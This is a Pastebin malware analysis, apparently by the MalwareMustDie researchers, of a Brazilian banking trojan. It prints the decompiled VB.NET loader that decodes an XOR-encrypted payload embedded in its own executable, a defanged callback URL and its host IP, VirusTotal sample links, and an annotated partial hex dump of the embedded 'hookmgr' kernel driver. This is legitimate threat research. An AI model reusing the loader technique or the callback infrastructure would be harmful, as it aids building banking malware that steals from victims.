Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

BraziL BankTrojan VB.NET w/Embed bins 37MB

MalwareMustDie Jan 30th, 2016 (edited) 824 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. // #MalwareMustDie - Case: Brazil Bank Trojan w/size 37MB
  2. // IS a VB.NET with Embedded binary.
  3. // callback to:
  4. // GET HTTP/1.1
  5. // h00p://contador.blackmagictwo.com/visualizar/fix.php
  6.    {
  7.      "ip": "200.98.201.148",
  8.      "ptr": "200-98-201-148.clouduol.com.br",
  9.      "country": "BR",
  10.      "loc": "-23.5477,-46.6358",
  11.      "org": "AS7162 Universo Online S.A."
  12.      "prf": "200.98.192.0/18 uol.com.br"
  13.    }
  14. // picref: https://twitter.com/MalwareMustDie/status/693641189648572416 (read full thread)
  15. // Sample (2)
  16.    https://www.virustotal.com/en/file/57a2dd99dd0c153a45b52f065645a8953b8a8fcef97a6c3538a4de166f845474/analysis/1454211673/
  17.    https://www.virustotal.com/en/file/887b3c737be52c594c12b564269bad659d9f8a37624bf6a624857d0735fc973c/analysis/1454219912/
  18.  
  19. // JINXED MALCODE BIN LOADER
  20.  
  21. // Toiusx.saojoao.Program
  22. public static void Main()
  23.  {  MyProject.Forms.Form2.BackgroundWorker1.RunWorkerAsync();}
  24.  
  25. private void Form1_Load(object sender, EventArgs e)
  26.   {Program.Main();}
  27.  
  28. private void BackgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
  29.   {this.WHATEVER();}
  30.  
  31. public void MMD-NAil3dYourC0de()
  32.  {  string[] array = Strings.Split(File.ReadAllText(Application.ExecutablePath),\\
  33.                      MySettingsProperty.Settings.tamp, -1, CompareMethod.Binary);
  34.     byte[] fosga = (byte[])typeof(Convert).GetMethod(this.var1.Text + this.var2.Text).\\
  35.                     Invoke(null, new object[]{array[1]});
  36.     Form1.Bolhax(Form1.READ_BYTES(fosga, this.var13.Text + this.var14.Text));  }
  37.  
  38. public static byte[] READ_BYTES(byte[] fosga, string ximu)
  39.  {  Array.Reverse(fosga);
  40.     checked
  41.      {
  42.       byte b = fosga[fosga.Length - 1];
  43.       byte[] bytes = Encoding.Default.GetBytes(ximu);
  44.       byte[] array = new byte[fosga.Length + 1];
  45.       int num = 0;
  46.       int arg_30_0 = 0;
  47.       int num2 = fosga.Length - 1;
  48.       for (int i = arg_30_0; i <= num2; i++)
  49.         {  array[i] = (fosga[i] ^ b ^ bytes[num]);
  50.        Array.Reverse(bytes);
  51.        if ((double)num == unchecked((double)bytes.Length - Conversions.ToDouble(MySettingsProperty.Settings.rip)))
  52.         {num = 0;}
  53.        else
  54.         {num = (int)Math.Round(unchecked((double)num + Conversions.ToDouble(MySettingsProperty.Settings.rip)));}
  55.         } return array;}}
  56.  
  57. // The data is actually a PE (no file) and is a malicious driver:
  58.    https://www.virustotal.com/en/file/e547aeb12345c226d24406ba751e9cb0f95a98b167b8eee5bacc370fc09d56e3/analysis/1454217852/
  59.  
  60. 00000000  4d 5a 90 00 03 00 00 00  04 00 00 00 ff ff 00 00  |MZ..............|
  61. 00000010  b8 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
  62. 00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  63. 00000030  00 00 00 00 00 00 00 00  00 00 00 00 c8 00 00 00  |................|
  64. 00000040  0e 1f ba 0e 00 b4 09 cd  21 b8 01 4c cd 21 54 68  |........!..L.!Th|
  65. 00000050  69 73 20 70 72 6f 67 72  61 6d 20 63 61 6e 6e 6f  |is program canno|
  66. 00000060  74 20 62 65 20 72 75 6e  20 69 6e 20 44 4f 53 20  |t be run in DOS |
  67. 00000070  6d 6f 64 65 2e 0d 0d 0a  24 00 00 00 00 00 00 00  |mode....$.......|
  68. 00000080  9b a7 2f 92 df c6 41 c1  df c6 41 c1 df c6 41 c1  |../...A...A...A.|
  69. 00000090  df c6 40 c1 d3 c6 41 c1  d6 be d2 c1 dc c6 41 c1  |..@...A.......A.|
  70. 000000a0  d6 be d4 c1 dd c6 41 c1  d6 be c2 c1 d9 c6 41 c1  |......A.......A.|
  71. 000000b0  d6 be d0 c1 de c6 41 c1  52 69 63 68 df c6 41 c1  |......A.Rich..A.|
  72. 000000c0  00 00 00 00 00 00 00 00  50 45 00 00 4c 01 05 00  |........PE..L...|
  73. 000000d0  15 52 5a 56 00 00 00 00  00 00 00 00 e0 00 02 01  |.RZV............|
  74. 000000e0  0b 01 09 00 00 0c 00 00  00 06 00 00 00 00 00 00  |................|
  75. 000000f0  3e 40 00 00 00 10 00 00  00 20 00 00 00 00 01 00  |>@....... ......|
  76. 00000100  00 10 00 00 00 02 00 00  06 00 01 00 06 00 01 00  |................|
  77. 00000110  06 00 01 00 00 00 00 00  00 60 00 00 00 04 00 00  |.........`......|
  78. 00000120  52 78 00 00 01 00 00 00  00 00 04 00 00 10 00 00  |Rx..............|
  79. 00000130  00 00 10 00 00 10 00 00  00 00 00 00 10 00 00 00  |................|
  80. 00000140  00 00 00 00 00 00 00 00  50 40 00 00 28 00 00 00  |........P@..(...|
  81. 00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  82. 00000160  00 00 00 00 00 00 00 00  00 50 00 00 94 00 00 00  |.........P......|
  83. 00000170  40 20 00 00 1c 00 00 00  00 00 00 00 00 00 00 00  |@ ..............|
  84. 00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  85. 00000190  60 20 00 00 40 00 00 00  00 00 00 00 00 00 00 00  |` ..@...........|
  86. 000001a0  00 20 00 00 34 00 00 00  00 00 00 00 00 00 00 00  |. ..4...........|
  87. 000001b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  88. 000001c0  2e 74 65 78 74 00 00 00  30 08 00 00 00 10 00 00  |.text...0.......|
  89. 000001d0  00 0a 00 00 00 04 00 00  00 00 00 00 00 00 00 00  |................|
  90. 000001e0  00 00 00 00 20 00 00 68  2e 72 64 61 74 61 00 00  |.... ..h.rdata..|
  91. 000001f0  34 01 00 00 00 20 00 00  00 02 00 00 00 0e 00 00  |4.... ..........|
  92. 00000200  00 00 00 00 00 00 00 00  00 00 00 00 40 00 00 48  |............@..H|
  93. 00000210  2e 64 61 74 61 00 00 00  38 00 00 00 00 30 00 00  |.data...8....0..|
  94. 00000220  00 02 00 00 00 10 00 00  00 00 00 00 00 00 00 00  |................|
  95. 00000230  00 00 00 00 40 00 00 c8  49 4e 49 54 00 00 00 00  |....@...INIT....|
  96. 00000240  90 01 00 00 00 40 00 00  00 02 00 00 00 12 00 00  |.....@..........|
  97. 00000250  00 00 00 00 00 00 00 00  00 00 00 00 20 00 00 e2  |............ ...|
  98. 00000260  2e 72 65 6c 6f 63 00 00  b6 00 00 00 00 50 00 00  |.reloc.......P..|
  99. 00000270  00 02 00 00 00 14 00 00  00 00 00 00 00 00 00 00  |................|
  100. 00000280  00 00 00 00 40 00 00 42  00 00 00 00 00 00 00 00  |....@..B........|
  101. 00000290  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  102. 00000410  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 17 01 00 8b  |..U......E......|
  103. 00000420  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  104. 00000430  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  105. 00000440  8b ff 55 8b ec 83 ec 0c  c7 45 f4 40 17 01 00 8b  |..U......E.@....|
  106. 00000450  45 f4 50 8d 4d f8 51 ff  15 04 20 01 00 8d 55 f8  |E.P.M.Q... ...U.|
  107. 00000460  52 ff 15 00 20 01 00 8b  e5 5d c3 cc cc cc cc cc  |R... ....]......|
  108. 00000470  8b ff 55 8b ec 6a fe 68  18 21 01 00 68 d0 13 01  |..U..j.h.!..h...|
  109. 00000480  00 64 a1 00 00 00 00 50  81 c4 cc fd ff ff 53 56  |.d.....P......SV|
  110. 00000490  57 a1 00 30 01 00 31 45  f8 33 c5 50 8d 45 f0 64  |W..0..1E.3.P.E.d|
  111. 000004a0  a3 00 00 00 00 89 65 e8  8b 45 0c 50 e8 ff 01 00  |......e..E.P....|
  112. 000004b0  00 89 85 d4 fd ff ff 8b  8d d4 fd ff ff 8b 51 08  |..............Q.|
  113. 000004c0  89 95 cc fd ff ff 8b 45  0c 8b 48 0c 89 4d e0 8b  |.......E..H..M..|
  114. 000004d0  55 0c c7 42 1c 00 00 00  00 8b 85 d4 fd ff ff 8a  |U..B............|
  115. 000004e0  08 88 8d c0 fd ff ff 80  bd c0 fd ff ff 0e 74 05  |..............t.|
  116. 000004f0  e9 72 01 00 00 8b 95 d4  fd ff ff 8b 42 0c 89 85  |.r..........B...|
  117. 00000500  bc fd ff ff 81 bd bc fd  ff ff 04 40 22 00 74 25  |...........@ .t%|
  118. 00000510  81 bd bc fd ff ff 0c 40  22 00 0f 84 a9 00 00 00  |.......@".......|
  119. 00000520  81 bd bc fd ff ff 14 40  22 00 0f 84 e2 00 00 00  |.......@".......|
  120. 00000530  e9 26 01 00 00 83 bd cc  fd ff ff 0c 72 7c 8b 4d  |.&..........r|.M|
  121. 00000540  e0 89 4d e4 c7 45 fc 00  00 00 00 6a 01 8b 55 e4  |..M..E.....j..U.|
  122. 00000550  8b 42 08 50 8b 4d e4 8b  11 52 ff 15 0c 20 01 00  |.B.P.M...R... ..|
  123. 00000560  8b 45 e4 8b 48 08 51 8b  55 e4 8b 42 04 50 8b 4d  |.E..H.Q.U..B.P.M|
  124. 00000570  e4 8b 11 52 e8 b1 03 00  00 83 c4 0c c7 85 c8 fd  |...R............|
  125. 00000580  ff ff 00 00 00 00 c7 45  fc fe ff ff ff eb 29 8b  |.......E......).|
  126. 00000590  45 ec 8b 08 8b 11 89 95  c4 fd ff ff b8 01 00 00  |E...............|
  127. 000005a0  00 c3 8b 65 e8 8b 85 c4  fd ff ff 89 85 c8 fd ff  |...e............|
  128. 000005b0  ff c7 45 fc fe ff ff ff  eb 0a c7 85 c8 fd ff ff  |..E.............|
  129. 000005c0  23 00 00 c0 e9 9c 00 00  00 83 3d 1c 30 01 00 00  |#.........=.0...|
  130. 000005d0  75 0a e8 39 fe ff ff a3  1c 30 01 00 83 3d 1c 30  |u..9.....0...=.0|
  131. 000005e0  01 00 00 74 21 8b 4d e0  8b 15 1c 30 01 00 89 11  |...t!.M....0....|
  132. 000005f0  8b 45 0c c7 40 1c 04 00  00 00 c7 85 c8 fd ff ff  |.E..@...........|
  133. 00000600  00 00 00 00 eb 0a c7 85  c8 fd ff ff 8c 02 00 c0  |................|
  134. 00000610  eb 53 83 3d 20 30 01 00  00 75 0a e8 20 fe ff ff  |.S.= 0...u.. ...|
  135. 00000620  a3 20 30 01 00 83 3d 20  30 01 00 00 74 21 8b 4d  |. 0...= 0...t!.M|
  136. 00000630  e0 8b 15 20 30 01 00 89  11 8b 45 0c c7 40 1c 04  |... 0.....E..@..|
  137. 00000640  00 00 00 c7 85 c8 fd ff  ff 00 00 00 00 eb 0a c7  |................|
  138. 00000650  85 c8 fd ff ff 8c 02 00  c0 eb 0a c7 85 c8 fd ff  |................|
  139. 00000660  ff 10 00 00 c0 eb 0a c7  85 c8 fd ff ff 00 00 00  |................|
  140. 00000670  00 8b 4d 0c 8b 95 c8 fd  ff ff 89 51 18 32 d2 8b  |..M........Q.2..|
  141. 00000680  4d 0c ff 15 08 20 01 00  33 c0 8b 4d f0 64 89 0d  |M.... ..3..M.d..|
  142. 00000690  00 00 00 00 59 5f 5e 5b  8b e5 5d c2 08 00 cc cc  |....Y_^[..].....|
  143. 000006a0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  144. 000006b0  8b ff 55 8b ec 51 8b 45  08 0f be 48 23 8b 55 08  |..U..Q.E...H#.U.|
  145. 000006c0  0f be 42 22 83 c0 01 3b  c8 7e 20 6a 00 68 15 5b  |..B....;.~ j.h.[|
  146. 000006d0  00 00 68 b0 17 01 00 68  80 17 01 00 ff 15 14 20  |..h....h....... |
  147. 000006e0  01 00 c7 45 fc 00 00 00  00 eb 07 c7 45 fc 01 00  |...E........E...|
  148. 000006f0  00 00 8b 4d 08 8b 41 60  8b e5 5d c2 04 00 cc cc  |...M..A`..].....|
  149. 00000700  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  150. 00000710  8b ff 55 8b ec 83 ec 0c  c7 45 f4 10 18 01 00 c7  |..U......E......|
  151. 00000720  45 f8 e0 17 01 00 8b 45  f4 50 68 28 30 01 00 ff  |E......E.Ph(0...|
  152. 00000730  15 04 20 01 00 8b 4d f8  51 68 30 30 01 00 ff 15  |.. ...M.Qh00....|
  153. 00000740  04 20 01 00 68 18 30 01  00 6a 00 6a 00 6a 15 68  |. ..h.0..j.j.j.h|
  154. 00000750  28 30 01 00 6a 00 8b 55  08 52 ff 15 20 20 01 00  |(0..j..U.R..  ..|
  155. 00000760  89 45 fc 83 7d fc 00 7c  4a 68 28 30 01 00 68 30  |.E..}..|Jh(0..h0|
  156. 00000770  30 01 00 ff 15 1c 20 01  00 89 45 fc 83 7d fc 00  |0..... ...E..}..|
  157. 00000780  7c 24 8b 45 08 c7 40 70  70 10 01 00 8b 4d 08 8b  ||$.E..@pp....M..|
  158. 00000790  55 08 8b 42 70 89 41 40  8b 4d 08 8b 55 08 8b 42  |U..Bp.A@.M..U..B|
  159. 000007a0  40 89 41 38 eb 0d 8b 0d  18 30 01 00 51 ff 15 18  |@.A8.....0..Q...|
  160. 000007b0  20 01 00 8b 45 fc 8b e5  5d c2 08 00 cc cc cc cc  | ...E...].......|
  161. 000007c0  cc cc cc cc cc cc cc cc  cc cc cc cc cc cc cc cc  |................|
  162. 000007d0  8b ff 55 8b ec 83 ec 14  53 8b 5d 0c 56 8b 73 08  |..U.....S.].V.s.|
  163. 000007e0  33 35 00 30 01 00 57 8b  06 c6 45 ff 00 c7 45 f8  |35.0..W...E...E.|
  164. 000007f0  01 00 00 00 8d 7b 10 83  f8 fe 74 0d 8b 4e 04 03  |.....{....t..N..|
  165. 00000800  cf 33 0c 38 e8 c2 02 00  00 8b 4e 0c 8b 46 08 03  |.3.8......N..F..|
  166. 00000810  cf 33 0c 38 e8 b2 02 00  00 8b 45 08 f6 40 04 66  |.3.8......E..@.f|
  167. 00000820  0f 85 e2 00 00 00 8b 4d  10 8d 55 ec 89 53 fc 8b  |.......M..U..S..|
  168. 00000830  5b 0c 89 45 ec 89 4d f0  83 fb fe 74 5f 8d 49 00  |[..E..M....t_.I.|
  169. 00000840  8d 04 5b 8b 4c 86 14 8d  44 86 10 89 45 f4 8b 00  |..[.L...D...E...|
  170. 00000850  89 45 08 85 c9 74 14 8b  d7 e8 cc 01 00 00 c6 45  |.E...t.........E|
  171. 00000860  ff 01 85 c0 7c 40 7f 47  8b 45 08 8b d8 83 f8 fe  |....|@.G.E......|
  172. 00000870  75 ce 80 7d ff 00 74 24  8b 06 83 f8 fe 74 0d 8b  |u..}..t$.....t..|
  173. 00000880  4e 04 03 cf 33 0c 38 e8  3f 02 00 00 8b 4e 0c 8b  |N...3.8.?....N..|
  174. 00000890  56 08 03 cf 33 0c 3a e8  2f 02 00 00 8b 45 f8 5f  |V...3.:./....E._|
  175. 000008a0  5e 5b 8b e5 5d c3 c7 45  f8 00 00 00 00 eb c9 8b  |^[..]..E........|
  176. 000008b0  4d 0c e8 a3 01 00 00 8b  45 0c 39 58 0c 74 12 68  |M.......E.9X.t.h|
  177. 000008c0  00 30 01 00 57 8b d3 8b  c8 e8 a6 01 00 00 8b 45  |.0..W..........E|
  178. 000008d0  0c 8b 4d 08 89 48 0c 8b  06 83 f8 fe 74 0d 8b 4e  |..M..H......t..N|
  179. 000008e0  04 03 cf 33 0c 38 e8 e0  01 00 00 8b 4e 0c 8b 56  |...3.8......N..V|
  180. 000008f0  08 03 cf 33 0c 3a e8 d0  01 00 00 8b 45 f4 8b 48  |...3.:......E..H|
  181. 00000900  08 8b d7 e8 39 01 00 00  ba fe ff ff ff 39 53 0c  |....9........9S.|
  182. 00000910  74 8a 68 00 30 01 00 57  8b cb e8 55 01 00 00 e9  |t.h.0..W...U....|
  183. 00000920  54 ff ff ff cc cc cc cc  cc cc ff 25 10 20 01 00  |T..........%. ..|
  184. 00000930  cc cc cc cc cc cc cc cc  53 56 57 8b 54 24 10 8b  |........SVW.T$..|
  185. 00000940  44 24 14 8b 4c 24 18 55  52 50 51 51 68 c8 15 01  |D$..L$.URPQQh...|
  186. 00000950  00 64 ff 35 00 00 00 00  a1 00 30 01 00 33 c4 89  |.d.5......0..3..|
  187. 00000960  44 24 08 64 89 25 00 00  00 00 8b 44 24 30 8b 58  |D$.d.%.....D$0.X|
  188. 00000970  08 8b 4c 24 2c 33 19 8b  70 0c 83 fe fe 74 3b 8b  |..L$,3..p....t;.|
  189. 00000980  54 24 34 83 fa fe 74 04  3b f2 76 2e 8d 34 76 8d  |T$4...t.;.v..4v.|
  190. 00000990  5c b3 10 8b 0b 89 48 0c  83 7b 04 00 75 cc 68 01  |\.....H..{..u.h.|
  191. 000009a0  01 00 00 8b 43 08 e8 ee  00 00 00 b9 01 00 00 00  |....C...........|
  192. 000009b0  8b 43 08 e8 00 01 00 00  eb b0 64 8f 05 00 00 00  |.C........d.....|
  193. 000009c0  00 83 c4 18 5f 5e 5b c3  8b 4c 24 04 f7 41 04 06  |...._^[..L$..A..|
  194. 000009d0  00 00 00 b8 01 00 00 00  74 33 8b 44 24 08 8b 48  |........t3.D$..H|
  195. 000009e0  08 33 c8 e8 e3 00 00 00  55 8b 68 18 ff 70 0c ff  |.3......U.h..p..|
  196. 000009f0  70 10 ff 70 14 e8 3e ff  ff ff 83 c4 0c 5d 8b 44  |p..p..>......].D|
  197. 00000a00  24 08 8b 54 24 10 89 02  b8 03 00 00 00 c3 55 8b  |$..T$.........U.|
  198. 00000a10  4c 24 08 8b 29 ff 71 1c  ff 71 18 ff 71 28 e8 15  |L$..).q..q..q(..|
  199. 00000a20  ff ff ff 83 c4 0c 5d c2  04 00 55 56 57 53 8b ea  |......]...UVWS..|
  200. 00000a30  33 c0 33 db 33 d2 33 f6  33 ff ff d1 5b 5f 5e 5d  |3.3.3.3.3...[_^]|
  201. 00000a40  c3 8b ea 8b f1 8b c1 6a  01 e8 4b 00 00 00 33 c0  |.......j..K...3.|
  202. 00000a50  33 db 33 c9 33 d2 33 ff  ff e6 55 8b ec 53 56 57  |3.3.3.3...U..SVW|
  203. 00000a60  6a 00 6a 00 68 6f 16 01  00 51 e8 51 00 00 00 5f  |j.j.ho...Q.Q..._|
  204. 00000a70  5e 5b 5d c3 55 8b 6c 24  08 52 51 ff 74 24 14 e8  |^[].U.l$.RQ.t$..|
  205. 00000a80  b4 fe ff ff 83 c4 0c 5d  c2 08 00 cc cc cc cc cc  |.......]........|
  206. 00000a90  53 51 bb 08 30 01 00 eb  0b 53 51 bb 08 30 01 00  |SQ..0....SQ..0..|
  207. 00000aa0  8b 4c 24 0c 89 4b 08 89  43 04 89 6b 0c 55 51 50  |.L$..K..C..k.UQP|
  208. 00000ab0  58 59 5d 59 5b c2 04 00  ff d0 c3 cc cc cc cc cc  |XY]Y[...........|
  209. 00000ac0  ff 25 28 20 01 00 cc cc  cc cc cc 3b 0d 00 30 01  |.%( .......;..0.|
  210. 00000ad0  00 75 03 c2 00 00 e9 05  00 00 00 cc cc cc cc cc  |.u..............|
  211. 00000ae0  8b ff 55 8b ec 51 89 4d  fc 6a 00 ff 35 04 30 01  |..U..Q.M.j..5.0.|
  212. 00000af0  00 ff 35 00 30 01 00 ff  75 fc 68 f7 00 00 00 ff  |..5.0...u.h.....|
  213. 00000b00  15 2c 20 01 00 cc cc cc  cc cc cc cc cc cc cc cc  |., .............|
  214. ---------------------------------------------------------------------------------------------
  215. 00000b10  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadId
  216. 00000b20  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadId");
  217. 00000b30  61 00 64 00 49 00 64 00  00 00 cc cc cc cc cc cc  |a.d.I.d.........| return MmGetSystemRoutineAddress(&DestinationString);
  218. ---------------------------------------------------------------------------------------------
  219. 00000b40  50 00 73 00 47 00 65 00  74 00 43 00 75 00 72 00  |P.s.G.e.t.C.u.r.| PsGetCurrentThreadProcessId
  220. 00000b50  72 00 65 00 6e 00 74 00  54 00 68 00 72 00 65 00  |r.e.n.t.T.h.r.e.|
  221. 00000b60  61 00 64 00 50 00 72 00  6f 00 63 00 65 00 73 00  |a.d.P.r.o.c.e.s.| RtlInitUnicodeString(&DestinationString, L"PsGetCurrentThreadProcessId");
  222. 00000b70  73 00 49 00 64 00 00 00  cc cc cc cc cc cc cc cc  |s.I.d...........| return MmGetSystemRoutineAddress(&DestinationString);
  223. ---------------------------------------------------------------------------------------------
  224. 00000b80  49 72 70 2d 3e 43 75 72  72 65 6e 74 4c 6f 63 61  |Irp->CurrentLoca| c:\winddk\7600.1385.1\inc\ddk\wdm.h
  225. 00000b90  74 69 6f 6e 20 3c 3d 20  49 72 70 2d 3e 53 74 61  |tion <= Irp->Sta|
  226. 00000ba0  63 6b 43 6f 75 6e 74 20  2b 20 31 00 cc cc cc cc  |ckCount + 1.....|
  227. 00000bb0  63 3a 5c 77 69 6e 64 64  6b 5c 37 36 30 30 2e 31  |c:\winddk\7600.1|
  228. 00000bc0  36 33 38 35 2e 31 5c 69  6e 63 5c 64 64 6b 5c 77  |6385.1\inc\ddk\w|
  229. 00000bd0  64 6d 2e 68 00 cc cc cc  cc cc cc cc cc cc cc cc  |dm.h............|
  230. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  231. RtlAssert("Irp->CurrentLocation <= Irp->StackCount + 1", "c:\\winddk\\7600.16385.1\\inc\\ddk\\wdm.h", %d, 0); return *(_DWORD *)(%var + 96);
  232. //////////////////////////////////// my memo@unixfreaxjp //////////////////////////////////////
  233. ---------------------------------------------------------------------------------------------
  234. 00000be0  5c 00 44 00 6f 00 73 00  44 00 65 00 76 00 69 00  |\.D.o.s.D.e.v.i.| \DosDevices\hookmgr
  235. 00000bf0  63 00 65 00 73 00 5c 00  68 00 6f 00 6f 00 6b 00  |c.e.s.\.h.o.o.k.| RtlInitUnicodeString(&stru_13030, L"\\DosDevices\\hookmgr");
  236. 00000c00  6d 00 67 00 72 00 00 00  cc cc cc cc cc cc cc cc  |m.g.r...........|
  237. ---------------------------------------------------------------------------------------------
  238. 00000c10  5c 00 44 00 65 00 76 00  69 00 63 00 65 00 5c 00  |\.D.e.v.i.c.e.\.| \Devices\hookmgr
  239. 00000c20  68 00 6f 00 6f 00 6b 00  6d 00 67 00 72 00 00 00  |h.o.o.k.m.g.r...| RtlInitUnicodeString(&DestinationString, L"\\Device\\hookmgr");
  240. 00000c30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  241. 00000e00  ac 40 00 00 c8 40 00 00  e0 40 00 00 f6 40 00 00  |.@...@...@...@..|
  242. 00000e10  06 41 00 00 10 41 00 00  1c 41 00 00 2e 41 00 00  |.A...A...A...A..| 0x11310
  243. 00000e20  46 41 00 00 58 41 00 00  74 41 00 00 80 41 00 00  |FA..XA..tA...A..| DeviceObj =
  244. 00000e30  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................| IoCreateDevice(DriverObject, 0,
  245. 00000e40  00 00 00 00 15 52 5a 56  00 00 00 00 02 00 00 00  |.....RZV........| &DestinationString, %d, 0, 0, &DeviceObject);
  246. 00000e50  5c 00 00 00 a8 20 00 00  a8 0e 00 00 00 00 00 00  |\.... ..........|
  247. 00000e60  48 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |H...............|
  248. 00000e70  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  249. 00000e90  00 00 00 00 00 00 00 00  00 00 00 00 00 30 01 00  |.............0..|
  250. 00000ea0  10 21 01 00 02 00 00 00  52 53 44 53 46 e6 2e db  |.!......RSDSF...|
  251. 00000eb0  7b 74 f7 4e 8d 83 34 2d  26 1f 8f 6e 01 00 00 00  |{t.N..4-&..n....|
  252. ---------------------------------------------------------------------------------------------
  253. 00000ec0  63 3a 5c 75 73 65 72 73  5c 61 64 6d 69 6e 5c 61  |c:\users\admin\a|
  254. 00000ed0  70 70 64 61 74 61 5c 72  6f 61 6d 69 6e 67 5c 78  |ppdata\roaming\x|  A LOL
  255. 00000ee0  38 36 5c 6f 62 6a 63 68  6b 5f 77 69 6e 37 5f 78  |86\objchk_win7_x|  pdb :-P)
  256. 00000ef0  38 36 5c 69 33 38 36 5c  68 6f 6f 6b 6d 67 72 2e  |86\i386\hookmgr.|
  257. 00000f00  70 64 62 00 00 00 00 00  00 00 00 00 00 00 00 00  |pdb.............|
  258. ---------------------------------------------------------------------------------------------
  259. 00000f10  d0 13 00 00 c8 15 00 00  fe ff ff ff 00 00 00 00  |................|
  260. 00000f20  ac fd ff ff 00 00 00 00  fe ff ff ff 8f 11 01 00  |................|
  261. 00000f30  a2 11 01 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  262. 00000f40  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  263. 00001000  4e e6 40 bb b1 19 bf 44  20 05 93 19 00 00 00 00  |N.@....D .......|
  264. 00001010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  265. 00001200  00 00 00 00 00 a1 00 30  01 00 b9 4e e6 40 bb 85  |.......0...N.@..|
  266. 00001210  c0 74 04 3b c1 75 1a a1  24 20 01 00 8b 00 35 00  |.t.;.u..$ ....5.|
  267. 00001220  30 01 00 a3 00 30 01 00  75 07 8b c1 a3 00 30 01  |0....0..u.....0.|
  268. 00001230  00 f7 d0 a3 04 30 01 00  c3 cc cc cc cc cc 8b ff  |.....0..........|
  269. 00001240  55 8b ec e8 bd ff ff ff  5d e9 c2 d2 ff ff cc cc  |U.......].......|
  270. 00001250  78 40 00 00 00 00 00 00  00 00 00 00 66 41 00 00  |x@..........fA..|
  271. 00001260  00 20 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |. ..............|
  272. 00001270  00 00 00 00 00 00 00 00  ac 40 00 00 c8 40 00 00  |.........@...@..|
  273. 00001280  e0 40 00 00 f6 40 00 00  06 41 00 00 10 41 00 00  |.@...@...A...A..|
  274. 00001290  1c 41 00 00 2e 41 00 00  46 41 00 00 58 41 00 00  |.A...A..FA..XA..|
  275. 000012a0  74 41 00 00 80 41 00 00  00 00 00 00 e6 03 4d 6d  |tA...A........Mm|
  276. 000012b0  47 65 74 53 79 73 74 65  6d 52 6f 75 74 69 6e 65  |GetSystemRoutine|
  277. 000012c0  41 64 64 72 65 73 73 00  ee 05 52 74 6c 49 6e 69  |Address...RtlIni|
  278. 000012d0  74 55 6e 69 63 6f 64 65  53 74 72 69 6e 67 00 00  |tUnicodeString..|
  279. 000012e0  ba 02 49 6f 66 43 6f 6d  70 6c 65 74 65 52 65 71  |..IofCompleteReq|
  280. 000012f0  75 65 73 74 00 00 dd 04  50 72 6f 62 65 46 6f 72  |uest....ProbeFor|
  281. 00001300  57 72 69 74 65 00 4b 08  6d 65 6d 63 70 79 00 00  |Write.K.memcpy..|
  282. 00001310  60 05 52 74 6c 41 73 73  65 72 74 00 fc 01 49 6f  |`.RtlAssert...Io|
  283. 00001320  44 65 6c 65 74 65 44 65  76 69 63 65 00 00 f1 01  |DeleteDevice....|
  284. 00001330  49 6f 43 72 65 61 74 65  53 79 6d 62 6f 6c 69 63  |IoCreateSymbolic|
  285. 00001340  4c 69 6e 6b 00 00 e7 01  49 6f 43 72 65 61 74 65  |Link....IoCreate|
  286. 00001350  44 65 76 69 63 65 00 00  9c 03 4b 65 54 69 63 6b  |Device....KeTick|
  287. 00001360  43 6f 75 6e 74 00 6e 74  6f 73 6b 72 6e 6c 2e 65  |Count.ntoskrnl.e|
  288. 00001370  78 65 00 00 90 06 52 74  6c 55 6e 77 69 6e 64 00  |xe....RtlUnwind.|
  289. 00001380  dd 02 4b 65 42 75 67 43  68 65 63 6b 45 78 00 00  |..KeBugCheckEx..|
  290. 00001390  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  291. 00001400  00 10 00 00 70 00 00 00  1b 30 29 30 33 30 4b 30  |....p....0)030K0|
  292. 00001410  59 30 63 30 78 30 7d 30  92 30 5c 31 cb 31 d8 31  |Y0c0x0}0.0\1.1.1|
  293. 00001420  de 31 ea 31 14 32 21 32  27 32 33 32 84 32 d3 32  |.1.1.2!2 232.2.2|
  294. 00001430  d8 32 de 32 1b 33 22 33  2b 33 31 33 3a 33 40 33  |.2.2.3 3+313:3@3|
  295. 00001440  45 33 50 33 5c 33 6a 33  6f 33 75 33 88 33 a8 33  |E3P3\3j3o3u3.3.3|
  296. 00001450  af 33 e2 33 c0 34 13 35  2c 35 4d 35 59 35 65 36  |.3.3.4.5,5M5Y5e6|
  297. 00001460  93 36 9c 36 c2 36 cd 36  ed 36 f3 36 01 37 00 00  |.6.6.6.6.6.6.7..|
  298. 00001470  00 20 00 00 10 00 00 00  9c 30 a0 30 2c 31 30 31  |. .......0.0,101|
  299. 00001480  00 40 00 00 14 00 00 00  06 30 18 30 1f 30 24 30  |.@.......0.0.0$0|
  300. 00001490  2d 30 34 30 00 00 00 00  00 00 00 00 00 00 00 00  |-040............|
  301. 000014a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
  302.  
